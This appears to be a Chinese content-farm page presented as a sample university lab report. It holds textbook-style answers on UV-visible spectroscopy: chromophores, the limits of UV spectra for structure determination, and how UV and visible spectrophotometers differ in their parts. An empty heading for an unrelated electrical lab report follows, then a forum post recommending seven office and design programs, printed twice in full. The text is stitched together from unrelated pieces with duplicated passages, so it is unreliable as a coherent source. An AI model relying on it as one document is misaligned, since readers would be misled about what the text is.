当在饱和碳氢化合物中引入含有π键的不饱和基团时,会使这些化合物的最大吸收波长位移至紫外及可见光区,这种不饱和基团成为生色团.例如,CH2CH2的最大吸收波长位于171nm处,而乙烷则位于远紫外区. 5.在有机化合物的鉴定及结构推测上,紫外吸收光谱所提供的信息具有什么特点?

解:紫外吸收光谱提供的信息基本上是关于分子中生色团和助色团的信息,而不能提供整个分子的信息,即紫外光谱可以提供一些官能团的重要信息,所以只凭紫外光谱数据尚不能完全确定物质的分子结构,还必须与其它方法配合起来.

10.紫外及可见分光光度计与可见分光光度计比较,有什么不同之处?为什么?

解:首先光源不同,紫外用氢灯或氘灯,而可见用钨灯,因为二者发出的光的波长范围不同.

从单色器来说,如果用棱镜做单色器,则紫外必须使用石英棱镜,可见则石英棱镜或玻璃棱镜均可使用,而光栅则二者均可使用,这主要是由于玻璃能吸收紫外光的缘故.

从吸收池来看,紫外只能使用石英吸收池,而可见则玻璃、石英均可使用,原因同上。

从检测器来看,可见区一般使用氧化铯光电管,它适用的波长范围为625-1000nm,紫外用锑铯光电管,其波长范围为200-625nm.

第20篇:长安大学电工实验报告三相电

走上社会前最好要学会使用的7款软件,都是通用的,大家都可以用的,和专业无关

大家有别的意见,可以跟帖

word 不用说了吧,你别以为你会,试试编个自动生成的目录,会吗?

excel 不会不知道吧,你也别以为你会,知道什么是数据透视表吗?

dreamweaver 网络时代不会做个简单的网页,别混了你,不要用frontpage,这个才好用

mindmanager 没听说过吧?思维导图知道吗?创意思维之源,写文档就靠它了

photoshop 照片图像处理利器,不会是不行的,往图片上加字都不会,怎么混?考你一下,什么叫alpha 通道

magicflu 人人必备的万能信息和知识管理工具,延伸你的脑力

visio 有些人可能知道,画流程图,组织结构图什么的必备,也是office里的

走上社会前最好要学会使用的7款软件,都是通用的,大家都可以用的,和专业无关

大家有别的意见,可以跟帖

word 不用说了吧,你别以为你会,试试编个自动生成的目录,会吗?

excel 不会不知道吧,你也别以为你会,知道什么是数据透视表吗?

dreamweaver 网络时代不会做个简单的网页,别混了你,不要用frontpage,这个才好用

mindmanager 没听说过吧?思维导图知道吗?创意思维之源,写文档就靠它了

photoshop 照片图像处理利器,不会是不行的,往图片上加字都不会,怎么混?考你一下,什么叫alpha 通道

magicflu 人人必备的万能信息和知识管理工具,延伸你的脑力

visio 有些人可能知道,画流程图,组织结构图什么的必备,也是office里的

大学实验报告仪器范文
《大学实验报告仪器范文.doc》
将本文的Word文档下载到电脑,方便编辑。
推荐度:
点击下载文档
相关专题
点击下载本文文档